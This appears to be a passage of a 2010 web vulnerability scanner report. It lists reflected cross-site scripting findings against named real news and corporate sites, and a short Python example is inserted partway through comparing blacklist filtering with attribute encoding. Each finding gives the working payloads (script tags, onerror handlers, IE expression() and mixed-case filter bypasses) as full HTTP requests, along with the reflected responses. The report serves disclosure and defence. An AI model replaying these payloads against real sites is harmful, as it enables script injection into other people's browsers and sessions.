This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /author.asp?section_id=949&doc_id=190224&f_src=internetevolution_gnews&22722"><script>alert(1)</script>c870c6a6705=1 HTTP/1.1
Host: www.internetevolution.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 907f7"><img%20src%3da%20onerror%3dalert(1)>cab9a87042 was submitted in the REST URL parameter 3. This input was echoed as 907f7"><img src=a onerror=alert(1)>cab9a87042 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /security/article.php/3789956907f7"><img%20src%3da%20onerror%3dalert(1)>cab9a87042/Report+Warns+of+More+Cybercrime.htm HTTP/1.1
Host: www.internetnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:16:33 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 97065
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80828"><img%20src%3da%20onerror%3dalert(1)>82f26ad946e was submitted in the REST URL parameter 4. This input was echoed as 80828"><img src=a onerror=alert(1)>82f26ad946e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /security/article.php/3789956/Report+Warns+of+More+Cybercrime.htm80828"><img%20src%3da%20onerror%3dalert(1)>82f26ad946e HTTP/1.1
Host: www.internetnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:17:04 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 156223
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62a8"%20style%3dx%3aexpression(alert(1))%20426e64acc81 was submitted in the REST URL parameter 3. This input was echoed as f62a8" style=x:expression(alert(1)) 426e64acc81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /security/article.php/3818166f62a8"%20style%3dx%3aexpression(alert(1))%20426e64acc81/Facebook+Fights+Second+Phishing+Attack.htm HTTP/1.1
Host: www.internetnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:16:41 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 97073
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e405"><img%20src%3da%20onerror%3dalert(1)>04e58aae264 was submitted in the REST URL parameter 4. This input was echoed as 1e405"><img src=a onerror=alert(1)>04e58aae264 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /security/article.php/3818166/Facebook+Fights+Second+Phishing+Attack.htm1e405"><img%20src%3da%20onerror%3dalert(1)>04e58aae264 HTTP/1.1
Host: www.internetnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:17:15 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 154430
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.99. http://www.investors.com/NewsAndAnalysis/Article/542148/201007301734/Newest-Name-Extension-Dot-Co-Attracting-Buyers-.aspx [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25511"><script>alert(1)</script>e4bcefe05c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /NewsAndAnalysis/Article/542148/201007301734/Newest-Name-Extension-Dot-Co-Attracting-Buyers-.aspx?25511"><script>alert(1)</script>e4bcefe05c3=1 HTTP/1.1
Host: www.investors.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.100. http://www.investors.com/NewsAndAnalysis/Article/542152/201007301734/Cybersquatters-Camp-At-Dot-Com-.aspx [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5484b"><script>alert(1)</script>5d849295bff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /NewsAndAnalysis/Article/542152/201007301734/Cybersquatters-Camp-At-Dot-Com-.aspx?5484b"><script>alert(1)</script>5d849295bff=1 HTTP/1.1
Host: www.investors.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.101. http://www.isnic.is/about/terms.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isnic.is
Path:
/about/terms.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50136"><script>alert(1)</script>c47723f4262 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/terms.php?50136"><script>alert(1)</script>c47723f4262=1 HTTP/1.1
Host: www.isnic.is
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:16:53 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8n DAV/2 PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Cache-Control: private must-revalidate
Set-Cookie: PHPSESSID=7a8f922197308131779f30a9a8046677; path=/
Connection: close
Content-Type: text/html
Content-Length: 24180
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="is">
1.102. http://www.itbusinessedge.com/cm/community/news/sec/blog/facebook-gets-security-help-from-markmonitor/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac634"><ScRiPt>alert(1)</ScRiPt>de16193bc6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /cm/community/news/sec/blog/facebook-gets-security-help-from-markmonitor/?cs=32258&ac634"><ScRiPt>alert(1)</ScRiPt>de16193bc6d=1 HTTP/1.1
Host: www.itbusinessedge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
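As an added illustration of why the blacklist remediation above matters, and of the attribute-context payload variants used earlier in this section (the mixed-case `<ScRiPt>`, the `<img onerror>` event handler and the Internet Explorer `style=x:expression()` trick), the following Python is example code, not part of the scanner report or of any of the sites' own code. It runs the report's four payloads through a deliberately weak token blacklist of the kind the report describes, then through context-appropriate attribute encoding, and audits each result with a browser-like parser. The template, hostnames and helper names are assumptions.

```python
import html
from html.parser import HTMLParser

# Payloads copied from the attribute-context findings above (itbusinessedge,
# internetevolution, internetnews). The template is a hypothetical stand-in for a
# page that echoes part of the request URL into a double-quoted attribute.
PAYLOADS = {
    "lowercase script": '22722"><script>alert(1)</script>c870c6a6705',
    "mixed-case script": 'ac634"><ScRiPt>alert(1)</ScRiPt>de16193bc6d',
    "event handler": '907f7"><img src=a onerror=alert(1)>cab9a87042',
    "IE style expression": 'f62a8" style=x:expression(alert(1)) 426e64acc81',
}
TEMPLATE = '<input type="hidden" name="returnUrl" value="/author.asp?{value}">'


def blacklist_filter(value):
    """The kind of defence the report describes: strip a fixed list of known-bad
    tokens, matched case-sensitively. Deliberately weak, to show the bypasses."""
    for bad in ("<script", "</script"):
        value = value.replace(bad, "")
    return value


def encode_html_attr(value):
    """Context-appropriate output encoding for a double-quoted attribute."""
    return html.escape(value, quote=True)


def render(value, defence):
    return TEMPLATE.format(value=defence(value))


class _Audit(HTMLParser):
    """Flags anything a browser would treat as live content outside the one
    expected <input> tag: extra tags, on* handlers, expression() in a style
    attribute, and text that has leaked out of the attribute value."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            self.findings.append("unexpected tag <%s>" % tag)
        for name, val in attrs:
            if name.startswith("on"):
                self.findings.append("event handler %s=%s" % (name, val))
            if name == "style" and "expression(" in (val or "").lower():
                self.findings.append("expression() in style attribute")

    def handle_data(self, data):
        if data.strip():
            self.findings.append("text outside the attribute: %r" % data.strip())


def audit(markup):
    p = _Audit()
    p.feed(markup)
    p.close()
    return p.findings


def evaluate(defence):
    """Payload label -> list of findings after applying the defence."""
    return {label: audit(render(p, defence)) for label, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, defence in (("blacklist", blacklist_filter), ("encode", encode_html_attr)):
        for label, findings in evaluate(defence).items():
            print("%-9s %-20s %s" % (name, label, findings or "clean"))
```

Even the one payload the blacklist "blocks" still breaks out of the attribute (the leftover `alert(1)>...` becomes page text), which is the real symptom: the filter removes a token but does nothing about the `"` that ends the attribute. Attribute encoding leaves every payload inside the value, where the parser hands it back as inert data.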
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9e7a"><script>alert(1)</script>aec47416125 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /internetb9e7a"><script>alert(1)</script>aec47416125/76983/domain-name-wars-rise-cybersquatters HTTP/1.1
Host: www.itworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:14:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS7f41de3c122f8e2a2210fde0e7133a0e=fc2cngis6ro1oqta54ljud06b3; expires=Mon, 03-Jan-2011 05:48:02 GMT; path=/; domain=.itworld.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:14:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 73070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <link rel="canonical" href="http://www.itworld.com/internetb9e7a"><script>alert(1)</script>aec47416125/76983/domain-name-wars-rise-cybersquatters" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d30f9"><script>alert(1)</script>3a0744ded44 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /internet/76983d30f9"><script>alert(1)</script>3a0744ded44/domain-name-wars-rise-cybersquatters HTTP/1.1
Host: www.itworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:14:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS7f41de3c122f8e2a2210fde0e7133a0e=vma8tsaac9g6pgpjgkq1836t51; expires=Mon, 03-Jan-2011 05:48:04 GMT; path=/; domain=.itworld.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:14:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 73070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<link rel="canonical" href="http://www.itworld.com/internet/76983d30f9"><script>alert(1)</script>3a0744ded44/domain-name-wars-rise-cybersquatters" />
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98d59"><script>alert(1)</script>a830ae3ef9a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /internet/76983/domain-name-wars-rise-cybersquatters98d59"><script>alert(1)</script>a830ae3ef9a HTTP/1.1
Host: www.itworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:14:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS7f41de3c122f8e2a2210fde0e7133a0e=cemi9qfuj8jubr81qbca5fog61; expires=Mon, 03-Jan-2011 05:48:06 GMT; path=/; domain=.itworld.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:14:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 73070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<link rel="canonical" href="http://www.itworld.com/internet/76983/domain-name-wars-rise-cybersquatters98d59"><script>alert(1)</script>a830ae3ef9a" />
...[SNIP]...
1.106. http://www.itworld.com/internet/76983/domain-name-wars-rise-cybersquatters [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90993"><script>alert(1)</script>6bab0eeea38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /internet/76983/domain-name-wars-rise-cybersquatters?90993"><script>alert(1)</script>6bab0eeea38=1 HTTP/1.1
Host: www.itworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fe5b"><script>alert(1)</script>5a1ad4c90f was submitted in the page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /internet/76983/domain-name-wars-rise-cybersquatters?page=0%2C08fe5b"><script>alert(1)</script>5a1ad4c90f HTTP/1.1
Host: www.itworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21f55"style%3d"x%3aexpression(alert(1))"f539bed3a06 was submitted in the REST URL parameter 1. This input was echoed as 21f55"style="x:expression(alert(1))"f539bed3a06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /blog21f55"style%3d"x%3aexpression(alert(1))"f539bed3a06/ HTTP/1.1
Host: www.javelinstrategy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: CMSSESSID7da0dc01=ut6vgcok6q2ouq7orm7qrggrd6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.109. http://www.kroll.com/include/document.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.kroll.com
Path: /include/document.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ce68'-alert(1)-'3d970e2e072 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /include/document.asp?7ce68'-alert(1)-'3d970e2e072=1 HTTP/1.1
Host: www.kroll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=176843135.1292033507.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=176843135.1231045933.1292033507.1292033507.1292033507.1; __utmc=176843135; ASP.NET_SessionId=cxikg2mjjqt4ug55xh1xo2mm; __utmb=176843135.12.10.1292033507;
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Dec 2010 02:12:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4169
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACCQRBRC=FPEMFPLACKMIGCIOMJAELBHJ; path=/
Cache-control: private
1.110. http://www.markmonitor.com/cta/bji-special-edition2010/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.markmonitor.com
Path: /cta/bji-special-edition2010/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8d2a"><a>f95df614ad5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/bji-special-edition2010/?c8d2a"><a>f95df614ad5=1 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:05:30 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 31789
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/bji-special-edition2010/?c8d2a"><a>f95df614ad5=1" id="campaign-form">
...[SNIP]...
1.111. http://www.markmonitor.com/cta/bji-winter2009/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.markmonitor.com
Path: /cta/bji-winter2009/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67ea8"><a>8ccb119936c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/bji-winter2009/?67ea8"><a>8ccb119936c=1 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:05:28 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 32021
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/bji-winter2009/?67ea8"><a>8ccb119936c=1" id="campaign-form">
...[SNIP]...
1.112. http://www.markmonitor.com/cta/cs-AAA/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.markmonitor.com
Path: /cta/cs-AAA/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3a06"><a>08ea581b97d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/cs-AAA/?a3a06"><a>08ea581b97d=1 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:05:11 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 31993
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/cs-AAA/?a3a06"><a>08ea581b97d=1" id="campaign-form">
...[SNIP]...
1.113. http://www.markmonitor.com/cta/cs-Deckers/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.markmonitor.com
Path: /cta/cs-Deckers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aa25"><a>0367222a9dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cta/cs-Deckers/?1aa25"><a>0367222a9dc=1 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:05:18 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 32134
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/cs-deckers/?1aa25"><a>0367222a9dc=1" id="campaign-form">
...[SNIP]...
The value of the Lead_Source_Mktg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79c67"><a>51070ed2d68 was submitted in the Lead_Source_Mktg parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/cs-wwe/?Lead_Source_Mktg=HP79c67"><a>51070ed2d68 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 01:56:32 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 31623
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/cs-wwe/?Lead_Source_Mktg=HP79c67"><a>51070ed2d68" id="campaign-form">
...[SNIP]...
1.115. http://www.markmonitor.com/cta/cs-wwe/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.markmonitor.com
Path: /cta/cs-wwe/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ab60"><a>ddf1e94f83d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/cs-wwe/?1ab60"><a>ddf1e94f83d=1 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 01:56:51 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 31582
Connection: close
